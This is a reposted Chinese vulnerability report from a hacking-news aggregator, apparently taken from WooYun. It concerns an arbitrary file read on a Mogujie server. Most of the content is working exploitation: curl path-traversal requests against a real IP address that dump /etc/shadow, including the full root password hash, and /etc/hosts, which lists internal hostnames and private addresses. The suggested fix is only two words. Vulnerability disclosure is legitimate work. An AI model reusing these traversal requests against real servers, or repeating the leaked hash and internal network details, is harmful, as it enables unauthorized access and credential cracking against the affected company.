记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

蘑菇街某服务器任意文件读取(包括root hash)

2015-03-05 21:31

code 区域
[root@localhost tmp]# curl 117.121.133.42/../../../../../../../../../../../../../../../../../etc/shadow

root:$6$VFf/m0um$vq.ruj9SoNJQG7KIUmWLCdi8RYjSu.USYygQCd0aXjUkDwoi2t9ACzEN9RM7IKoJ4BIQQ5AvJFgsfQ.6LNYtY.:16139:0:99999:7:::

bin:*:15628:0:99999:7:::

daemon:*:15628:0:99999:7:::

adm:*:15628:0:99999:7:::

lp:*:15628:0:99999:7:::

sync:*:15628:0:99999:7:::

shutdown:*:15628:0:99999:7:::

halt:*:15628:0:99999:7:::

mail:*:15628:0:99999:7:::

uucp:*:15628:0:99999:7:::

operator:*:15628:0:99999:7:::

games:*:15628:0:99999:7:::

gopher:*:15628:0:99999:7:::

ftp:*:15628:0:99999:7:::

nobody:*:15628:0:99999:7:::

dbus:!!:16031::::::

vcsa:!!:16031::::::

abrt:!!:16031::::::

haldaemon:!!:16031::::::

ntp:!!:16031::::::

saslauth:!!:16031::::::

postfix:!!:16031::::::

sshd:!!:16031::::::

tcpdump:!!:16031::::::

nscd:!!:16136::::::

nslcd:!!:16136::::::



漏洞证明:

code 区域
[root@localhost tmp]# curl 117.121.133.42/../../../../../../../../../../../../../../../../../etc/hosts

127.0.0.1 localhost www.mogujie.com top.mogujie.com open.mogujie.com upload.mogujie.com shop.mogujie.com ss.mogujie.com baicao.mogujie.com



192.168.2.163 juanniu163

192.168.2.13 juanniu13

192.168.2.24 juanniu24

192.168.2.199 juanniu199

192.168.2.36 juanniu36

192.168.2.11 juanniu11

192.168.2.3 juanniu3

192.168.2.4 juanniu4

192.168.4.161 juanniu4161

192.168.2.2 juanniu2

192.168.4.162 juanniu4162

192.168.4.163 juanniu4163

192.168.4.164 juanniu4164

192.168.4.165 juanniu4165

修复方案:

修改配置

知识来源: www.wooyun.org/bugs/wooyun-2015-092726

阅读:93196 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“蘑菇街某服务器任意文件读取(包括root hash)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云